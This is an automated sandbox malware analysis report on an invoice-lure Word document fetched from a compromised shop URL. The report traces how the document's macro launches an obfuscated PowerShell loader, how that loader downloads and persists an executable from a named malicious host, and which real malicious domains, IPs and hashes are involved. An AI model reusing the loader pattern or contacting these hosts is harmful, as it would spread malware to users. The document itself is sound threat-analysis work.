ID: 67658 Cookbook: browseurl.jbs Time: 20:07:02 Date: 11/07/2018 Version: 23.0.0

Table of Contents

Analysis Report
  Overview: Information; Detection; Confidence; Classification; Analysis Advice
  Signature Overview: AV Detection; Software Vulnerabilities; Networking; Persistence and Installation Behavior; Data Obfuscation; Spreading; System Summary; HIPS / PFW / Operating System Protection Evasion; Anti Debugging; Malware Analysis System Evasion; Hooking and other Techniques for Hiding and Protection; Language, Device and Operating System Detection
  Behavior Graph
  Simulations: Behavior and APIs
  Antivirus Detection: Initial Sample; Dropped Files; Unpacked PE Files; Domains; URLs
  Yara Overview: Initial Sample; PCAP (Network Traffic); Dropped Files; Memory Dumps; Unpacked PEs
  Joe Sandbox View / Context: IPs; Domains; ASN; Dropped Files
  Screenshots
  Startup
  Created / dropped Files
  Contacted Domains/Contacted IPs: Contacted Domains; Contacted URLs; Contacted IPs (Public)
  Static File Info: No static file info
  Network Behavior: Network Port Distribution; TCP Packets; UDP Packets; DNS Queries; DNS Answers; HTTP Request Dependency Graph; HTTP Packets
  Code Manipulations
  Statistics: Behavior
  System Behavior
    Analysis Process: iexplore.exe PID: 3684 Parent PID: 548 (File Activities; Registry Activities)
    Analysis Process: iexplore.exe PID: 3740 Parent PID: 3684 (File Activities; Registry Activities)
    Analysis Process: WINWORD.EXE PID: 2364 Parent PID: 3684 (File Activities: File Created, File Read; Registry Activities: Key Created)
    Analysis Process: powershell.exe PID: 2200 Parent PID: 2364 (File Activities: File Created, File Written, File Read; Registry Activities)
    Analysis Process: OSPPSVC.EXE PID: 2380 Parent PID: 424
    Analysis Process: 375.exe PID: 2868 Parent PID: 2200
    Analysis Process: 375.exe PID: 2852 Parent PID: 2868
    Analysis Process: montanacim.exe PID: 2500 Parent PID: 424
    Analysis Process: montanacim.exe PID: 2532 Parent PID: 2500
  Disassembly

Copyright Joe Security LLC 2018

Analysis Report

Overview

Information
  Joe Sandbox Version: 23.0.0
  Analysis ID: 67658
  Start time: 20:07:02
  Joe Sandbox Product: CloudBasic
  Start date: 11.07.2018
  Overall analysis duration: 0h 2m 19s
  Hypervisor based Inspection enabled:
  Report type: light
  Cookbook file name: browseurl.jbs
  Sample URL: http://www.shopsforclothes.uk/factura-adjunto/
  Analysis system description: Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java 8.0.1440.1)
  Number of analysed new started processes analysed: 12
  Number of new started drivers analysed: 0
  Number of existing processes analysed: 0
  Number of existing drivers analysed: 0
  Number of injected processes analysed: 0
  Technologies: EGA enabled
  Analysis stop reason: Timeout
  Detection: MAL
  Classification: mal100.evad.expl.win@15/14@2/3
  Cookbook Comments:
    Adjust boot time
    Correcting counters for adjusted boot time
  Warnings:
    Exclude process from analysis (whitelisted): WmiPrvSE.exe, conhost.exe, dllhost.exe
    Report size exceeded maximum capacity and may have missing behavior information.
    Report size getting too big, too many NtDeviceIoControlFile calls found.
    Report size getting too big, too many NtOpenKeyEx calls found.
    Report size getting too big, too many NtProtectVirtualMemory calls found.
    Report size getting too big, too many NtQueryAttributesFile calls found.
    Report size getting too big, too many NtQueryValueKey calls found.

Detection
  Strategy: Threshold
  Score: 100
  Range: 0-100
  Reporting: Report FP / FN

Confidence
  Strategy: Threshold
  Score: 5
  Range: 0-5
  Further Analysis Required?:

Classification
  [Figure: classification chart. Axes: Ransomware, Miner, Spreading, Evader, Phishing, Exploiter, Banker, Spyware, Trojan / Bot, Adware. Levels: clean, suspicious, malicious.]

Analysis Advice
  Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis

Signature Overview

AV Detection:
  Antivirus detection for dropped file
  Multi AV Scanner detection for dropped file

Software Vulnerabilities:
  Document exploit detected (process start blacklist hit)
  Potential browser exploit detected (process start blacklist hit)

Networking:
  HTTP GET or POST without a user agent
  Downloads files
  Downloads files from webservers via HTTP
  Performs DNS lookups
  Uses HTTPS

Persistence and Installation Behavior:
  Drops executables to the windows directory (C:\Windows) and starts them
  Drops PE files
  Drops PE files to the windows directory (C:\Windows)

Data Obfuscation:
  Binary contains a suspicious time stamp
  Document contains an embedded VBA with many randomly named variables
  Suspicious powershell command line found
  Binary may include packed or encrypted code

Spreading:
  Creates COM task schedule object (often to register a task for autostart)
  Enumerates the file system

System Summary:
  Document contains an embedded VBA macro which executes code when the document is opened / closed
  Document contains an embedded VBA macro which may execute processes
  Powershell connects to network
  Powershell drops PE file
  Creates mutexes
  Reads the hosts file
  PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)
  Classification label
  Creates files inside the user directory
  Creates temporary files
  Parts of this applications are using the .net runtime (Probably coded in C#)
  Reads ini files
  Reads software policies
  Spawns processes
  Uses an in-process (OLE) Automation server
  Found GUI installer (many successful clicks)
  Found graphical window changes (likely an installer)
  Uses Microsoft Silverlight
  Checks if Microsoft Office is installed
  Uses new MSVCR Dlls
  Binary contains paths to debug symbols

HIPS / PFW / Operating System Protection Evasion:
  Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Anti Debugging:
  Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
  Checks if the current process is being debugged
  Enables debug privileges
  Creates guard pages, often used to prevent reverse engineering and debugging

Malware Analysis System Evasion:
  Checks the free space of harddrives
  Contains long sleeps (>= 3 min)
  Enumerates the file system
  May sleep (evasive loops) to hinder dynamic analysis
  Queries disk information (often used to detect virtual machines)
  Queries a list of all running processes

Hooking and other Techniques for Hiding and Protection:
  System process connects to network (likely due to code injection or exploit)
  Starts Microsoft Word (often done to prevent that the user detects that something wrong)
  Stores large binary data to the registry
  Disables application error messsages (SetErrorMode)

Language, Device and Operating System Detection:
  Queries the installation date of Windows
  Queries the volume information (name, serial number etc) of a device
  Queries the cryptographic machine GUID

Behavior Graph
  [Figure: behavior graph. ID: 67658; URL: http://www.shopsforclothes.uk/factura-adjunto/; Startdate: 11/07/2018; Architecture: WINDOWS; Score: 100.
   Process nodes: iexplore.exe, WINWORD.EXE, powershell.exe, 375.exe, OSPPSVC.EXE, montanacim.exe.
   Network nodes: www.shopsforclothes.uk; www.gezginyerler.com; 177.240.22.159, 443 (MegaCableSAdeCVMX, Mexico); gezginyerler.com 94.73.145.234, 49172, 80 (CIZGITR, Turkey); 2 other IPs or domains.
   Dropped-file nodes: C:\Users\...\Factura-jul-734_7793344[1].doc; Factura-jul-734_77...doc.kusto82.partial; Factura-jul-734_77...ial:Zone.Identifier; C:\Users\user\AppData\Local\Temp\375.exe (PE32).]

Simulations

Behavior and APIs
  Time      Type             Description
  20:07:28  API Interceptor  354x Sleep call for process: iexplore.exe modified
  20:07:42  API Interceptor  5x Sleep call for process: WINWORD.EXE modified
  20:07:46  API Interceptor  3x Sleep call for process: OSPPSVC.EXE modified
  20:07:46  API Interceptor  1x Sleep call for process: powershell.exe modified
  20:07:51  API Interceptor  2x Sleep call for process: 375.exe modified
  20:07:53  API Interceptor  2x Sleep call for process: montanacim.exe modified

Antivirus Detection

Initial Sample
  Source: http://www.shopsforclothes.uk/factura-adjunto/
    Detection: 6%; Scanner: virustotal

Dropped Files

  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\E2PG59KZ\Factura-jul-734_7793344[1].doc
    Detection: 100%; Scanner: Avira; Label: HEUR/Macro.Downloader.AMAK.Gen
  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\E2PG59KZ\Factura-jul-734_7793344.doc.kusto82.partial
    Detection: 100%; Scanner: Avira; Label: HEUR/Macro.Downloader.AMAK.Gen
  Source: C:\Users\user\AppData\Local\Temp\375.exe
    Detection: 24%; Scanner: virustotal

Unpacked PE Files
  No Antivirus matches

Domains
  Source                   Detection  Scanner
  shopsforclothes.uk       0%         virustotal
  gezginyerler.com         0%         virustotal
  www.shopsforclothes.uk   6%         virustotal
  www.gezginyerler.com     4%         virustotal

URLs
  Source                                           Detection  Scanner
  http://www.gezginyerler.com/jposeirt/sk4npm/     6%         virustotal
  http://www.shopsforclothes.uk/factura-adjunto/   6%         virustotal

Yara Overview
  Initial Sample: No yara matches
  PCAP (Network Traffic): No yara matches
  Dropped Files: No yara matches
  Memory Dumps: No yara matches
  Unpacked PEs: No yara matches

Joe Sandbox View / Context
  IPs: No context
  Domains: No context
  ASN: No context
  Dropped Files: No context

Startup

System is w7
  iexplore.exe (PID: 3684 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: CA1F703CD665867E8132D2946FB55750)
    iexplore.exe (PID: 3740 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:3684 CREDAT:275457 /prefetch:2 MD5: CA1F703CD665867E8132D2946FB55750)
    WINWORD.EXE (PID: 2364 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\content.ie5\e2pg59kz\factura-jul-734_7793344.doc MD5: 5D798FF0BE2A8970D932568068ACFD9D)
      powershell.exe (PID: 2200 cmdline: powershell. ( $verbosepreference.tostring()[1,3]+'x'-join'') (new-object SYStEM.IO.cOMprESsiOn.DEFLATesTreaM( [SySteM.io.memorystream] [system.convert]::frombase64string( '[Base64 string]' ), [Io.comPrEssIoN.cOMpREsSIONmoDe]::DEcomPreSs ) foreach-object{new-object SysTEm.IO.StreamREAder( $_,[Text.enCoding]::aScIi ) } FOReACh-OBjEct{ $_.ReadToeND( ) } ) MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
        375.exe (PID: 2868 cmdline: 'C:\Users\SAMTAR~1\AppData\Local\Temp\375.exe' MD5: 5CFD7D5DDCE93878D78F788EE599CD4D)
          375.exe (PID: 2852 cmdline: C:\Users\SAMTAR~1\AppData\Local\Temp\375.exe MD5: 5CFD7D5DDCE93878D78F788EE599CD4D)
  OSPPSVC.EXE (PID: 2380 cmdline: C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE MD5: 358A9CCA612C68EB2F07DDAD4CE1D8D7)
  montanacim.exe (PID: 2500 cmdline: C:\Windows\system32\montanacim.exe MD5: 5CFD7D5DDCE93878D78F788EE599CD4D)
    montanacim.exe (PID: 2532 cmdline: C:\Windows\system32\montanacim.exe MD5: 5CFD7D5DDCE93878D78F788EE599CD4D)
  cleanup

Created / dropped Files

  C:\Users\SAMTAR~1\AppData\Local\Temp\~DF39AECE6F2D8D91FE.TMP
    Process: C:\Program Files\Internet Explorer\iexplore.exe
    File Type: FoxPro FPT, blocks size 258, next free block index 16711424
    Size (bytes): 29989
    Entropy (8bit): 1.5864525822286235

  C:\Users\SAMTAR~1\AppData\Local\Temp\~DFF15FB7F7397518C0.TMP
    Process: C:\Program Files\Internet Explorer\iexplore.exe
    File Type: FoxPro FPT, blocks size 258, next free block index 16711424
    Size (bytes): 12981
    Entropy (8bit): 0.5702287585746456

  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{453915F1-8535-11E8-B3E3-CCDA62336E41}.dat
    Process: C:\Program Files\Internet Explorer\iexplore.exe
    File Type: Microsoft Word Document
    Size (bytes): 32344
    Entropy (8bit): 1.7961453136900805

  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{453915F3-8535-11E8-B3E3-CCDA62336E41}.dat
    Process: C:\Program Files\Internet Explorer\iexplore.exe
    File Type: Microsoft Word Document
    Size (bytes): 19032
    Entropy (8bit): 1.5994134081644797

  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\E2PG59KZ\Factura-jul-734_7793344.doc.kusto82.partial
    Process: C:\Program Files\Internet Explorer\iexplore.exe
    File Type: 77139Yc4581
    Size (bytes): 273408
    Entropy (8bit): 6.944111945665807
    Malicious: true
    Antivirus: Avira, Detection: 100%

  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\E2PG59KZ\Factura-jul-734_7793344.doc.kusto82.partial:Zone.Identifier
    Process: C:\Program Files\Internet Explorer\iexplore.exe
    File Type: ASCII text, with CRLF line terminators
    Size (bytes): 26
    Entropy (8bit): 3.9500637564362093
    Malicious: true

  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\E2PG59KZ\Factura-jul-734_7793344.doc:Zone.Identifier
    Process: C:\Program Files\Internet Explorer\iexplore.exe
    File Type: very short file (no magic)
    Size (bytes): 1
    Entropy (8bit): 0.0

  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\E2PG59KZ\Factura-jul-734_7793344[1].doc
    Process: C:\Program Files\Internet Explorer\iexplore.exe
    File Type: 77139Yc4581
    Size (bytes): 273408
    Entropy (8bit): 6.944111945665807
    Malicious: true
    Antivirus: Avira, Detection: 100%

  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{48A42F0F-085E-4C91-AAFF-15F0360F0BDE}.tmp
    Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type: data
    Size (bytes): 1536
    Entropy (8bit): 1.394399881272213

  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C0B3E1FE-FA90-46FB-A94C-79F14B48BEF0}.tmp
    Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type: FoxPro FPT, blocks size 0, next free block index 218103808, 1st used item "\375"
    Size (bytes): 1024
    Entropy (8bit): 0.05390218305374581

  C:\Users\user\AppData\Local\Temp\375.exe
    Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type: PE32 executable (GUI) Intel 80386 system file, for MS Windows
    Size (bytes): 78848
    Entropy (8bit): 7.485110571209677
    Malicious: true
    Antivirus: virustotal, Detection: 24%

  C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
    Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type: data
    Size (bytes): 162
    Entropy (8bit): 1.7359603887346284

  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5V7KX1H03VFRMGGC1BGX.temp
    Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type: data
    Size (bytes): 8016
    Entropy (8bit): 3.5683528727209537

  \samr
    Process: C:\Program Files\Internet Explorer\iexplore.exe
    File Type: Hitachi SH big-endian COFF object, not stripped
    Size (bytes): 116
    Entropy (8bit): 4.053374040827533

Contacted Domains/Contacted IPs

Contacted Domains
  Name: shopsforclothes.uk; IP: 160.153.137.19; Active: true; Antivirus Detection: 0%, virustotal; Reputation: unknown
  Name: gezginyerler.com; IP: 94.73.145.234; Active: true; Malicious: true; Antivirus Detection: 0%, virustotal; Reputation: unknown
  Name: www.shopsforclothes.uk; IP: unknown; Active: unknown; Malicious: true; Antivirus Detection: 6%, virustotal; Reputation: unknown
  Name: www.gezginyerler.com; IP: unknown; Active: unknown; Malicious: true; Antivirus Detection: 4%, virustotal; Reputation: unknown

Contacted URLs
  Name: http://www.gezginyerler.com/jposeirt/sk4npm/
    Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Name: http://www.shopsforclothes.uk/factura-adjunto/
    Process: C:\Program Files\Internet Explorer\iexplore.exe

Contacted IPs

Public
  IP               Country         ASN    ASN Name                                     Malicious
  94.73.145.234    Turkey          34619  CIZGITR                                      true
  177.240.22.159   Mexico          13999  MegaCableSAdeCVMX
  160.153.137.19   United States   26496  AS-26496-GO-DADDY-COM-LLC-GoDaddycomLLCUS

Static File Info
  No static file info

Network Behavior

Network Port Distribution
  Total Packets: 147
  Ports: 443 (HTTPS), 80 (HTTP), 53 (DNS)

TCP Packets